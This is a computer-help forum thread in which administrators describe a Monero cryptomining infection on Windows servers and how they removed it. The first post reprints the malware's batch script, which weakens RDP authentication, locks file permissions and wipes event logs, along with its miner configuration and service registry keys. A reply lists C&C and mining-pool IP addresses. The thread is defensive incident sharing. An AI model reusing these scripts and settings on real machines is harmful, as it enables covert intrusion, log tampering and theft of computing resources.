Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Possible New Miner & Ransomware


  • Please log in to reply
4 replies to this topic

#1 kiralon

kiralon

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:01:22 AM

Posted 26 December 2017 - 08:09 PM

not sure
Just finished removing a nasty from a clients server that looked to be mining monero
 
Unlikely it came from email as they are protected by message labs (but still possible)
Could be a drive by download.
Systems were running SEP (Which was disabled)
Teamviewer password was changed.
Terminal Server was infected first, then moved to other servers

Creates an adobe update scheduled task to run update.bat every hour.
 
It creates 4 files
3 in c:\windows\fonts
update.bat
svchost.exe
config.json
 
1 in c:\windows\conhost     (makes the folder)
conhost.exe
This is
bitlocker drive encrytion servicing utility
evidently. I'm guessing that encryption follows mining.
Original filename: FVEUpdate.Exe
 
update.bat does the following (every hour)
@echo off
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
@echo y|cacls C:\Windows\Fonts\svchost.exe /p everyone:r
@echo y|cacls C:\Windows\conhost\conhost.exe /p everyone:r
@echo y|cacls C:\Windows\Fonts\config.json /p everyone:r
@echo y|cacls C:\Windows\conhost\conhost.exe /p everyone:r
wevtutil cl system
wevtutil cl security
wevtutil cl application
taskkill /im xmrig.exe /f

svchost is the xmrig mining tool

config.json contains

{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": "null",
"pools": [
{
"url": "get.bi-chi.com:3333",
"user":"49ER579mEyp4Mxq8NW8AfmX4KcXN1S6urWGdSmCrfittYEkoHLEgJaiUqbNA6LDrSL1QPbuLMPYMQB4e5YApiQbkKofE1i1",
"pass": "x",
"keepalive": true,
"nicehash": false
},
{
"url": "pool.minemonero.pro:5555",
"user": "49ER579mEyp4Mxq8NW8AfmX4KcXN1S6urWGdSmCrfittYEkoHLEgJaiUqbNA6LDrSL1QPbuLMPYMQB4e5YApiQbkKofE1i1",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}

and adds the following reg keys (could be more)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMIUpdateService]
"Type"=dword:00000010
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):43,00,3a,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,\
5c,00,63,00,6f,00,6e,00,68,00,6f,00,73,00,74,00,5c,00,63,00,6f,00,6e,00,68,\
00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="WMIUpdateService"
"ObjectName"="LocalSystem"
"DelayedAutostart"=dword:00000000
"FailureActionsOnNonCrashFailures"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMIUpdateService\Parameters]
"Application"=hex(2):43,00,3a,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,\
00,5c,00,46,00,6f,00,6e,00,74,00,73,00,5c,00,73,00,76,00,63,00,68,00,6f,00,\
73,00,74,00,2e,00,65,00,78,00,65,00,00,00
"AppParameters"=hex(2):00,00
"AppDirectory"=hex(2):43,00,3a,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,\
00,5c,00,46,00,6f,00,6e,00,74,00,73,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMIUpdateService\Parameters\AppExit]
@="Restart"

BC AdBot (Login to Remove)

 


#2 Danktified

Danktified

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:07:22 AM

Posted 04 January 2018 - 11:04 AM

Did you ever figure out how it spread? I squashed this infection on about 25 servers it had spread to in a few days.



#3 kiralon

kiralon
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:01:22 AM

Posted 04 January 2018 - 05:53 PM

Because of the machines it got on to I assumed it managed to steal some administrative credentials, so I changed all the administrative level passwords.r

But not specifically no sorry.

#4 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,609 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:09:22 AM

Posted 05 January 2018 - 06:55 AM

Were your files encrypted?
If so, are there any obvious file extensions appended to or with your encrypted data files....what is the extension and is it the same for each encrypted file or is it different?
Did you find any ransom notes and if so, what is the actual name of the note?
Did the cyber-criminals provide an email address to send payment to? If so, what is the email address?

The best way to identify the different ransomwares is the ransom note (including it's name), samples of the encrypted files, any obvious extensions appended to the encrypted files, information related to any email addresses or hyperlinks provided by the cyber-criminals to request payment and the malware file responsible for the infection.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#5 Danktified

Danktified

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:07:22 AM

Posted 05 January 2018 - 12:28 PM

There was no encryption, as far as I could tell they were soley trying to use CPU cycles. I had a similar, but slightly different version of the malware he mentioned. I used ProcMon to watch what the executable was doing and it talked once to what I assume is a C&C server, and then all other communications were with a couple monero mining sites.

 

C&C server addresses were 107.191.99.95 and 107.191.99.227

 

It was mining for 185.154.14.75:3333 until I blocked that, then it failed over to 45.32.210.133:5555.

 

Once both were blocked, CPU usage dropped down to 0%.

 

The update.bat, config.json, and svchost.exe files are only created when conhost.exe is running. Once you kill conhost, the other files dissapear.

 

I couldn't find any method of spreading however, or the original file that "installed" the malware.

 

The original Filename for conhost for me was NOTEPAD.EXE






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users